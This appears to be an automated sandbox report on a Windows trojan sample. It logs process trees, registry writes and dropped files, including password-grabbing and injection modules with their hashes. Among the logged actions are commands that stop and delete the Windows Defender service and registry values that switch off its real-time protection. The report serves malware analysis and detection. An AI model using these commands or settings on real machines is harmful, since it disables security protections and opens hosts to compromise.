Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn

Thread 0x23c

Category	Operation	Information	Success	Count	Logfile
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

Thread 0x824

136

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	19	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 62	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 17	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 57	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 25	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 54	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data

Process #20: sc.exe

Information	Value
ID	#20
File Name	c:\windows\system32\sc.exe
Command Line	sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:55, Reason: Child Process
Unmonitor	End Time: 00:00:57, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x83c
Parent PID	0xfd8 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 134 0x 8C0

Threads

Thread 0x134

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:31 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10905749	1	Fn
System	Get Time	type = Performance Ctr, time = 12979045394	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0xec0000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Control	service_name = WinDefend	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 349	1	Fn Data

Process #21: sc.exe

Information	Value
ID	#21
File Name	c:\windows\system32\sc.exe
Command Line	sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:56, Reason: Child Process
Unmonitor	End Time: 00:00:57, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x8e4
Parent PID	0xffc (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8D0 0x 8D4

Threads

Thread 0x8d0

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:32 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10906326	1	Fn
System	Get Time	type = Performance Ctr, time = 13036544912	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0xb70000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Delete	service_name = WinDefend	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 28	1	Fn Data

Process #23: taskeng.exe

Information	Value
ID	#23
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {E6ACF615-28B7-4794-9E2D-7B8DC4832D2F} S-1-5-18:NT AUTHORITY\System:Service:
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:22, Reason: Created Scheduled Job
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:02:54
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x914
Parent PID	0x34c (Unknown)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 91C 0x 920 0x 188 0x 15C 0x 12C 0x 138 0x 1E4

Process #24: tadiapce.exe

17003

1130

Information	Value
ID	#24
File Name	c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe
Command Line	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:23, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:02:53

OS Process Information

Information	Value
PID	0x214
Parent PID	0x914 (c:\windows\system32\taskeng.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 264 0x 28C 0x 2AC 0x 348 0x 120 0x 930 0x 174 0x 990 0x 9E4 0x 230 0x 93C 0x 51C 0x A38 0x 738 0x 510 0x C18 0x 308 0x 20C 0x 150 0x 754 0x D18 0x D0C 0x D08 0x D20 0x D10 0x D2C 0x 658 0x 810 0x D34 0x B84 0x B88 0x A2C 0x A40 0x A10 0x D44 0x D48 0x D80 0x D88 0x D7C 0x DC0 0x D78 0x DB0 0x DB8 0x D98 0x D8C 0x DAC 0x D94 0x D9C 0x 8EC 0x BF0 0x BEC 0x BE8 0x BDC 0x DF8 0x BA0 0x BAC 0x 604 0x 680 0x B0 0x DE0 0x DE8 0x DEC 0x E18 0x E1C 0x DF0 0x DD4 0x DD0 0x E30 0x DB4 0x F50 0x F60 0x F44 0x F54 0x F58

Dropped Files

Filename	File Size	Hash Values	Actions
settings.ini	17.89 KB	MD5: ebbf1f31b6de4fc2b9de6c80494eeb39 SHA1: 14db29cd23f83a5de771a2cc6cbb41a0ef101b0f SHA256: 2d690ec2c6c859767a9dc29eaedc67c2de103037951494a3eeae6335bac4ec00 SSDeep: 384:f8ip6dC2AWGShPfXbM2ffBME5fNPLmEFqQ12TJPW:f8RdQW7PfXbM2fNvzFFn12TJPW	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32	16.17 KB	MD5: 3a8f710f2a7c79c6829e9682af59040d SHA1: b9bf965045b3ddc6f332bc36e9cdd52ca03d8b7f SHA256: 0d7fec5789664c377667a89fe1a2098fb201014bafdf475d002a57c96689eb72 SSDeep: 384:/IpVB1xeH7b8hOaGjM6wM9hDUxYoxOoNgkR8UQrra1bVTDnDpPecSKT:/IYbb1xb91COygkRDk6	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32	578.94 KB	MD5: cbf6993507c3ce333977627d5dd80825 SHA1: 9c100fcbb95c3620cadfaf2eec5e63b2660585b0 SHA256: 08feb5be3c64dee2d43cab334ca37db9214c8d8f5acefd17487d60e38d2b8475 SSDeep: 12288:lWRNtoO/UtADpB/0C8EM3n0B8gmJBxx1B4DEmbmuDd6AIKJtW6l/Ve3kUzJ:lOogUtAf0YM388gmJBv1mDEGJIAe0Vo	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32	1.07 MB	MD5: 30e83e96a2ca2bd824fc6683557d0754 SHA1: e7b8b2235afa4185291be09b938ab84a3f56e507 SHA256: 070f2bb875507aee0cad7a540382f0ff5c18fa4249f6e7729f5530be5843f6e0 SSDeep: 24576:s0OCisGaLSGuZas9pjTeDfHn65brnW0+rflbbi:DOCioLROasTIfiYjlbm	... File Actions Show Properties Download
settings.ini	18.08 KB	MD5: bc40d11cfc6d5938ca3ca99d4847e0c7 SHA1: ece693ab628a17b5d572925f7eb361c61879ed61 SHA256: 99755825296d798f05089b5747382eae6d7b4691e3109ef21363e837149a3cb4 SSDeep: 384:f8ip6dC2AWGShPfXbMOfP0fNPLmEFqQ12TJPW:f8RdQW7PfXbM5zFFn12TJPW	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost	928 bytes	MD5: e74f7c2aacf9459d8412c96369d786fb SHA1: 2eb4812bd7d99ffbd84d5381b71475574505d992 SHA256: 82fddb63f4725e9775e9e5e51c83030dd29e339678c3bf1f82931628fb7730af SSDeep: 24:Bbu1tph88ekE5QIvuI8DGrrRQkFLqiSMRjlbH5V6RUqaE:xqtpm8EXdpr2k8ejdH5VdqaE	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj	129.53 KB	MD5: cc9f120d816b196026d034e7409b8544 SHA1: 03e17fc20d16992a7d0b7137ce8748ad2ecffc6c SHA256: 6ddde728b3ee6369ffed441f095e0d973efe8e39db2b56d0d458c10f9ef1b9ac SSDeep: 3072:hGq0IAYKU55Ioa8g/up43AbPu9bc0l91aVcsmXwiCRyoRW:wq0n8Coa8eup4weQqswwxPW	... File Actions Show Properties Download
C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj	83.42 KB	MD5: fc0ba72f44f4f18f8580b1ed490dea30 SHA1: 98bfd5a30ede84fe45cc951db555b8accdda7620 SHA256: 5fe39efbea646a051b8c52b0e0ed99c23fe72e74fd19bbae22b18ae773b115d2 SSDeep: 1536:B4EJ3ipsjCHVwsL4Q1Uqh1DTY5xuiosEayrzSMEg1m+RAzVGoQ7IY3S:BFJ3qsjVsL4oh1/YLbosEayhmKoHwv3S	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_3912d7c0-2df4-4798-9de9-c60c58f001d5	1.02 KB	MD5: 25182eaddd35243f1c663c9eef9bbbe6 SHA1: 6b011af171e9fc33e315660538cec3c34195e71e SHA256: af3275ba9dfd94740241eadb93eb66f282da7543e61ab2544d46d6c68e38ed3b SSDeep: 24:rKf5b6UKa6LXaZBwFgftYNIra4on9okhVBPYP:kb6U4XeBqnIWL2MBPI		... File Actions Show Properties Download

Threads

Thread 0x264

12623

502

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	2	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Borland32, address_out = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 255	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	3	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Window	Create	window_name = Squirrel Shootout by Brenton Andrew Saunders, class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
System	Sleep	duration = 50 milliseconds (0.050 seconds)	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75bb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyW, address_out = 0x774d1514	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExW, address_out = 0x774d14d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = ShellExecuteA, address_out = 0x75df7078	1	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 0	15	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 0	3	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 0	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnRealtimeEnable, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableIOAVProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
System	Sleep	duration = 3 milliseconds (0.003 seconds)	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x774c91dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x774cc532	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptEncrypt, address_out = 0x774e779b	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcpy, address_out = 0x77364cc0	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	255	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Filename	module_name = KERNEL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260	1	Fn
Module	Load	module_name = wtsapi32, base_address = 0x73f10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSEnumerateSessionsA, address_out = 0x73f14023	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSFreeMemory, address_out = 0x73f11b65	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSQueryUserToken, address_out = 0x73f11f81	1	Fn
User	Lookup Privilege	privilege = SeTcbPrivilege, luid = 7	1	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x0	1	Fn
Module	Load	module_name = CRYPT32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = bcrypt.dll, base_address = 0x0	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = WINHTTP.dll, base_address = 0x0	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = USERENV.dll, base_address = 0x0	1	Fn
Module	Load	module_name = ncrypt.dll, base_address = 0x0	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = IPHLPAPI.DLL, base_address = 0x0	1	Fn
Module	Load	module_name = SHELL32.dll, base_address = 0x0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	320	Fn
Module	Get Filename	module_name = SHELL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 512	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	2	Fn
Module	Get Filename	module_name = SHELL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260	1	Fn
System	Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Mutex	Create	mutex_name = Global\C850A606981932960	1	Fn
System	Get Info	type = Operating System	1	Fn
COM	Create	interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Info	type = Operating System	1	Fn
